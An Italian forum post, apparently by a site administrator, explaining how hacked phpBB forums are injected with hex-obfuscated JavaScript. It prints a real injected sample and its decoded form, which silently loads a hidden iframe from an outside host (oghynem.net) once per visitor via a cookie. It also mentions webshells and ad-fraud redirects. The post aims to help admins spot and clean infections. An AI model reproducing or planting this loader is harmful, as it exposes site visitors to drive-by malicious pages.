Restiamo in tema con i forum in PHPBB, tutti coloro che non lo sanno si chiederanno ma come fanno????
1) Si iscrivono e noi li attiviamo
2) Sfruttano le debolezze di altri siti con cui noi condividiamo la macchina server
3) Sono dei mostri in informatica e riescono a trovare bug anche nei forum con le ultime versioni aggiornate ( al 80% colpa delle varie MOD ).
Una volta che riescono ad avere accesso come AMMINISTRATORI ( root ) a tutti i vostri file inseriscono codice in JAVASCRIPT offuscato ovvero trasformato da semplice testo in esadecimale, il perché è molto semplice gli antivirus leggono il testo e non prendono in considerazione un comando offuscato, inoltre ad un occhio poco attento o pratico il codice può sembrare qualcosa di "NORMALE" e quindi non ci si allerta.
Voglio ora condividere con voi questa mia piccola conoscenza che mi sono fatto negli ultimi 2 anni, ogni qualvolta mi ritrovavo con un forum o un sito bucato e bloccato da Google.
Quello che vedete sotto è il codice offuscato in javascript:
Codice: Seleziona tutto
<!--81a338--><script type="text/javascript" language="javascript" >cygwm=;cuel=window;gxill=(1)?"0x":"123";vegwi=(5-3-1);try{--(document["body"])}catch(swufs){dmol=false;try{}catch(azbyw){dmol=21;}
if(1){qzj="17:5d:6c:65:5a:6b:60:66:65:17:5a:6e:6a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5a:6e:6a:27:30:1f:20:32:4:1:74:4:1:74"[cygwm](":");}cuel=qzj;qpg=[];for(ikl=22-20-2;-ikl+1391!=0;ikl+=1){nib=ikl;if((0x19==031))qpg+=String.fromCharCode(eval(gxill+cuel[1*nib])+0xa-vegwi);}hddrmg=eval;if(Math.ceil(5.5)===6)hddrmg(qpg)}</script><!--/81a338-->
<!--81a338--><!--/81a338-->
Fin dall'inizio si può benissimo notare che il codice è un comando in javascript, il corpo del codice è sempre uguale ma differenziare da un altro solo per il modo in cui viene dato lo spazio tra un numero e l'altro, in questo caso vediamo ( : ) due punti in altri casi viene codificato anche quello e vedremmo ( Zq ).
Ed ecco come si mostra il codice in chiaro:
Codice: Seleziona tutto
<!--81a338--><script type="text/javascript" language="javascript" > function z09 {
var static='ajax';
var controller='index.php';
var z = document.createElement('iframe');
z.src = [color=#FF0000]'http://oghynem.net/abd.php'[/color];
z.style.position = 'absolute';
z.style.color = '5';
z.style.height = '5px';
z.style.width = '5px';
z.style.left = '10005';
z.style.top = '10005';
if (!document.getElementById('z')) {
document.write('<p id=\'z\' class=\'z09\' ></p>');
document.getElementById('z').appendChild(z);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" +path : ");
}
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55)else{SetCookie('visited_uq', '55', '1', '/');
z09();
}
}</script><!--/81a338-->1) cercare di scaricare una webshell nel sito in modo da avere accesso garantito in futuro.
2) effetturare redirect " pubblicitario" a un qualsiasi sito
E si perché lo scopo principale di questi SPAMMER HACKER è quello di guadagnare soldi con la pubblicità, la maggior parte di questi personaggi non sono altro che distinti signori che lavorano nel campo del MARKETING e conoscono molto bene l'informatica o di solito si appoggiano a buoni informatici che sappiano bucare.
Dopo aver contattato migliaia di aziende in tutti i settori promettono milioni di visite UNIVOCHE in pochissimo tempo, logicamente dietro a un congruo compenso, l'unica via è quella di forzare le visite facendo diventare i siti di cui riescono a prendere il controllo dei siti ZOMBI da cui reindirizzare il maggior numero possibile di visitatori.
Nella mia piccola esperienza ho trovato siti tedeschi che vendevano pompe ad immersione, siti americani che vendevano esche vive per la pesca, siti italiani che vendevano funghi lascio a voi immaginare il resto.
La mia personale piccola soddisfazione è che conoscendo il codice lo individuo più velocemente cosi posso ripulire i file, nel caso non avessi fatto un backup preventivo, e inoltre avvertire le DITTE e metterle a conoscenza che hanno pagato un IMBROGLIONE per poter ricevere visite.
Mi auguro che questo mio piccolo TUTORIAL possa essere di aiuto a tutti voi nel controllo dei vostri Forum o Siti.
Gianni Caraci
